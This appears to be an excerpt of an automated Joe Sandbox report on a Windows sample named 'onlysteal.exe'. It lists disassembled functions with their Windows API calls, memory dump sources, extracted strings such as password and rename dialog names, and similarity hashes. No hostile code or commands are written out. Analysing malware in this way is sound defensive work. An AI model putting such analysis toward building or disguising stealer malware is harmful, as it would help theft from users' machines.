                                      • API ID: AdjustPointer$_abort
                                      • String ID:
                                      • API String ID: 2252061734-0
                                      • Opcode ID: 134aa63e978f8c3d24b6d498b9e626b835191034ef5c0885cab6c5186becfe38
                                      • Instruction ID: 0777e019ff7456a8150fc586618feb832991a52bb0923a351aca20338ed9d751
                                      • Opcode Fuzzy Hash: 134aa63e978f8c3d24b6d498b9e626b835191034ef5c0885cab6c5186becfe38
                                      • Instruction Fuzzy Hash: 2451C172521212EFDB298F14D845B6A73B4FF56313F24401AEC05462E2E731ED6CDB98
                                      Function 0025BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 0025BF39
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0025BF5C
                                        • Part of subcall function 00258E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0025CA2C,00000000,?,00256CBE,?,00000008,?,002591E0,?,?,?), ref: 00258E38
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0025BF82
                                      • _free.LIBCMT ref: 0025BF95
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0025BFA4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: 29a017e4d224785dc905469e4cf89ee38fce1af36c78176781eda8d1fb507597
                                      • Instruction ID: 5081392c627b78e82ef3ef8f5038eb1218665c101fa9fc1288abdeeda0bc37b7
                                      • Opcode Fuzzy Hash: 29a017e4d224785dc905469e4cf89ee38fce1af36c78176781eda8d1fb507597
                                      • Instruction Fuzzy Hash: 7201F7726216167F23225A766C4DC7F6A6DDEC7BA23144129FD08D2140EFB0CD1589B4
                                      Function 00259869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,00271030,00000200,002591AD,0025617E,?,?,?,?,0023D984,?,?,?,00000004,0023D710,?), ref: 0025986E
                                      • _free.LIBCMT ref: 002598A3
                                      • _free.LIBCMT ref: 002598CA
                                      • SetLastError.KERNEL32(00000000,00263A34,00000050,00271030), ref: 002598D7
                                      • SetLastError.KERNEL32(00000000,00263A34,00000050,00271030), ref: 002598E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: a02a52b94b6c78abdfa22b93b5812be4917ceac39bb5a27e0d451a2a75a95dce
                                      • Instruction ID: af181f55eef97721e5504d3c7f72068bef17d48e40e383ebb663e7292f14be81
                                      • Opcode Fuzzy Hash: a02a52b94b6c78abdfa22b93b5812be4917ceac39bb5a27e0d451a2a75a95dce
                                      • Instruction Fuzzy Hash: F2012136134602EBC6126B386C8E91A256DDFD33737210134FD04A2192EFB08C6D452D
                                      Function 00240EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002411CF: ResetEvent.KERNEL32(?), ref: 002411E1
                                        • Part of subcall function 002411CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 002411F5
                                      • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00240F21
                                      • CloseHandle.KERNEL32(?,?), ref: 00240F3B
                                      • DeleteCriticalSection.KERNEL32(?), ref: 00240F54
                                      • CloseHandle.KERNEL32(?), ref: 00240F60
                                      • CloseHandle.KERNEL32(?), ref: 00240F6C
                                        • Part of subcall function 00240FE4: WaitForSingleObject.KERNEL32(?,000000FF,00241206,?), ref: 00240FEA
                                        • Part of subcall function 00240FE4: GetLastError.KERNEL32(?), ref: 00240FF6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                      • String ID:
                                      • API String ID: 1868215902-0
                                      • Opcode ID: 3c6300052dd1886fbbe7d3dc3340d769431d45e7d9cffca7bb2dc828be726bf6
                                      • Instruction ID: 1d9e3f55d6ab9b42f763594469d1eb61afa2dc575eb35bc2c685747d4eda1e44
                                      • Opcode Fuzzy Hash: 3c6300052dd1886fbbe7d3dc3340d769431d45e7d9cffca7bb2dc828be726bf6
                                      • Instruction Fuzzy Hash: 6F015271110744EFC7229B64EC88BC6BBA9FB08710F004929F25B52560CBB57A98CB90
                                      Function 0025C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 0025C817
                                        • Part of subcall function 00258DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34), ref: 00258DE2
                                        • Part of subcall function 00258DCC: GetLastError.KERNEL32(00263A34,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34,00263A34), ref: 00258DF4
                                      • _free.LIBCMT ref: 0025C829
                                      • _free.LIBCMT ref: 0025C83B
                                      • _free.LIBCMT ref: 0025C84D
                                      • _free.LIBCMT ref: 0025C85F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 938673bebedc032015d16acb4f9a50087e9f966f9f50c184bef070801116db53
                                      • Instruction ID: 7ec44e9e1b9fe560ed63ff3983854a9312420aea64ca500738960471889aba24
                                      • Opcode Fuzzy Hash: 938673bebedc032015d16acb4f9a50087e9f966f9f50c184bef070801116db53
                                      • Instruction Fuzzy Hash: 8AF06832521305AF8A11EF78F48DC0A73F9AA107267655819F904E7551DFB1FC94CA58
                                      Function 00241FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 00241FE5
                                      • _wcslen.LIBCMT ref: 00241FF6
                                      • _wcslen.LIBCMT ref: 00242006
                                      • _wcslen.LIBCMT ref: 00242014
                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0023B371,?,?,00000000,?,?,?), ref: 0024202F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen$CompareString
                                      • String ID:
                                      • API String ID: 3397213944-0
                                      • Opcode ID: 05deeaa4292a51af7810379b6b958c7dd47cd11a95e34c699641560c646c61fa
                                      • Instruction ID: 9af604ee765f558dbe4016369c4f3e6f9c67d042c16feac7eb9e6cebc26447c1
                                      • Opcode Fuzzy Hash: 05deeaa4292a51af7810379b6b958c7dd47cd11a95e34c699641560c646c61fa
                                      • Instruction Fuzzy Hash: A3F06232418014BBCF2A5F91EC09D8A7F65DF40761B119005F9155B061CB729A79DA94
                                      Function 002415FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _swprintf
                                      • String ID: %ls$%s: %s
                                      • API String ID: 589789837-2259941744
                                      • Opcode ID: b7b478ea043ab57b14d30ca5d03708f72269c91bb82332dd87f009b4a5aafba6
                                      • Instruction ID: 2e0c7e89ddf1816967a7f89b61ab7853c1398418462fa2edb976c5e9b5db8ac9
                                      • Opcode Fuzzy Hash: b7b478ea043ab57b14d30ca5d03708f72269c91bb82332dd87f009b4a5aafba6
                                      • Instruction Fuzzy Hash: 9451D7357B8700F6FB2E1E908D47F25B26E6B05B04F254506F396644E1C6E2E4F0AF1A
                                      Function 00257F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\onlysteal.exe,00000104), ref: 00257FAE
                                      • _free.LIBCMT ref: 00258079
                                      • _free.LIBCMT ref: 00258083
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\Desktop\onlysteal.exe
                                      • API String ID: 2506810119-3503556797
                                      • Opcode ID: 7e1c48f74f959d352705f5a0f5d906a719a075ed87a8f7259a29a21dd70a860c
                                      • Instruction ID: 5fc05d5b81a17335af04dfce8d0bee77cda9b3a6b0affc3b8f9ea3933ff28a5d
                                      • Opcode Fuzzy Hash: 7e1c48f74f959d352705f5a0f5d906a719a075ed87a8f7259a29a21dd70a860c
                                      • Instruction Fuzzy Hash: AD31BF70A24219EFCB21DF9598849AEBBFCEF84311F104066ED04A7250DAB08E5CCBA4
                                      Function 002531D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 002531FB
                                      • _abort.LIBCMT ref: 00253306
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: EncodePointer_abort
                                      • String ID: MOC$RCC
                                      • API String ID: 948111806-2084237596
                                      • Opcode ID: 36719f8f2602798b93bf9a33a7b9ae836c7d101deed11449007a4382c5ba7dcc
                                      • Instruction ID: b3dc99f8e1931e49d7031ea7fb7d3d2401ae86b8a3fc20acb7ae1905d711eff8
                                      • Opcode Fuzzy Hash: 36719f8f2602798b93bf9a33a7b9ae836c7d101deed11449007a4382c5ba7dcc
                                      • Instruction Fuzzy Hash: 5041597190020AAFCF15DF94CC81AEEBBB5BF08345F188099FD04A7251D335AE64DB99
                                      Function 00237401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00237406
                                        • Part of subcall function 00233BBA: __EH_prolog.LIBCMT ref: 00233BBF
                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 002374CD
                                        • Part of subcall function 00237A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00237AAB
                                        • Part of subcall function 00237A9C: GetLastError.KERNEL32 ref: 00237AF1
                                        • Part of subcall function 00237A9C: CloseHandle.KERNEL32(?), ref: 00237B00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                      • API String ID: 3813983858-639343689
                                      • Opcode ID: 48aa9ee6188522d65ee8181b236f76d62c050d5f4e9be1a1da19d66e7c77de57
                                      • Instruction ID: ed2fae6b2858a58129876562c80f20fc639e27ac6bd5fa81592cf59dcd08c5a1
                                      • Opcode Fuzzy Hash: 48aa9ee6188522d65ee8181b236f76d62c050d5f4e9be1a1da19d66e7c77de57
                                      • Instruction Fuzzy Hash: 6B31E6F1E24249AADF25EFA4DC45BEEBBB9AF05304F004015F905A7181C7748AA4CB60
                                      Function 0024AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00231316: GetDlgItem.USER32(00000000,00003021), ref: 0023135A
                                        • Part of subcall function 00231316: SetWindowTextW.USER32(00000000,002635F4), ref: 00231370
                                      • EndDialog.USER32(?,00000001), ref: 0024AD98
                                      • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0024ADAD
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 0024ADC2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: ASKNEXTVOL
                                      • API String ID: 445417207-3402441367
                                      • Opcode ID: f3191c2d8efb1d7e51e290b7ca8b9321b8913667ae2e16e7ea774124832ff86a
                                      • Instruction ID: e601911f0241169f0e2956df5de082154ec8fe0e1363e8ebdc6daa743dd08f5b
                                      • Opcode Fuzzy Hash: f3191c2d8efb1d7e51e290b7ca8b9321b8913667ae2e16e7ea774124832ff86a
                                      • Instruction Fuzzy Hash: A011C872AE0201FFD7159F69EC49FAA7B69EF4A742F000016F241EB4A0C7619935DB23
                                      Function 0024DDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      • DialogBoxParamW.USER32(GETPASSWORD1,00010438,0024B270,?,?), ref: 0024DE18
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: DialogParam
                                      • String ID: GETPASSWORD1$r$$xz(
                                      • API String ID: 665744214-3022557106
                                      • Opcode ID: a30bd2dbaf0b9c52c59cbec8ecf0fca5ffc2687abd8b69f7903e8e89722097c5
                                      • Instruction ID: ff466025985d1e0deb20fd0b9e7eec19fd390db0c0fbfc12d32c63937ded9ddb
                                      • Opcode Fuzzy Hash: a30bd2dbaf0b9c52c59cbec8ecf0fca5ffc2687abd8b69f7903e8e89722097c5
                                      • Instruction Fuzzy Hash: 45115B32630254AADB16DE34AC09BAB3398EB0A750F144079FD49EB081C7F0ACA4C760
                                      Function 0023D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      • __fprintf_l.LIBCMT ref: 0023D954
                                      • _strncpy.LIBCMT ref: 0023D99A
                                        • Part of subcall function 00241DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00271030,00000200,0023D928,00000000,?,00000050,00271030), ref: 00241DC4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                      • String ID: $%s$@%s
                                      • API String ID: 562999700-834177443
                                      • Opcode ID: 2b674170aedc62926acf83473d0e96c529ae133781900c411ada5277cd5a2339
                                      • Instruction ID: a4f176604457498c26711700851cfbb3ab3073e39cfd7abab8d9149231ddd1d5
                                      • Opcode Fuzzy Hash: 2b674170aedc62926acf83473d0e96c529ae133781900c411ada5277cd5a2339
                                      • Instruction Fuzzy Hash: 9521B7B256024DAEEF20DFA4DC05FDE7BA8AF05300F040011F91096192E371DA78DF51
                                      Function 00240E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                      • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0023AC5A,00000008,?,00000000,?,0023D22D,?,00000000), ref: 00240E85
                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0023AC5A,00000008,?,00000000,?,0023D22D,?,00000000), ref: 00240E8F
                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0023AC5A,00000008,?,00000000,?,0023D22D,?,00000000), ref: 00240E9F
                                      Strings
                                      • Thread pool initialization failed., xrefs: 00240EB7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                      • String ID: Thread pool initialization failed.
                                      • API String ID: 3340455307-2182114853
                                      • Opcode ID: 019afdf6d8fdebff32c76ef63e5dcd74235336c4c2e4509402e8c300f0732f55
                                      • Instruction ID: f8aa0d923cd9b45555990c355ae9a513fbdca9da7aa247fd33097bdbb3920d3e
                                      • Opcode Fuzzy Hash: 019afdf6d8fdebff32c76ef63e5dcd74235336c4c2e4509402e8c300f0732f55
                                      • Instruction Fuzzy Hash: F811C4B16107099FC3209F669CC89A7FBECEB55740F108C2EF1CAC2201D6B199A08B50
                                      Function 0023124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Malloc
                                      • String ID: ($$2$$A
                                      • API String ID: 2696272793-2739150206
                                      • Opcode ID: d2779ced654faff5810280c0d621c392b505ab2cc67b6a891c7d36a9a74a7a44
                                      • Instruction ID: 13d4425f8b0312ae6dd7f0173135bce9a3eee760c2e4b5c2802d551047a28235
                                      • Opcode Fuzzy Hash: d2779ced654faff5810280c0d621c392b505ab2cc67b6a891c7d36a9a74a7a44
                                      • Instruction Fuzzy Hash: 2101DBB5901229ABCB14DFA4E8489DFBBF8AF09310F10415AE905E3250D7759E50CF94
                                      Function 0024DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                      • API String ID: 0-56093855
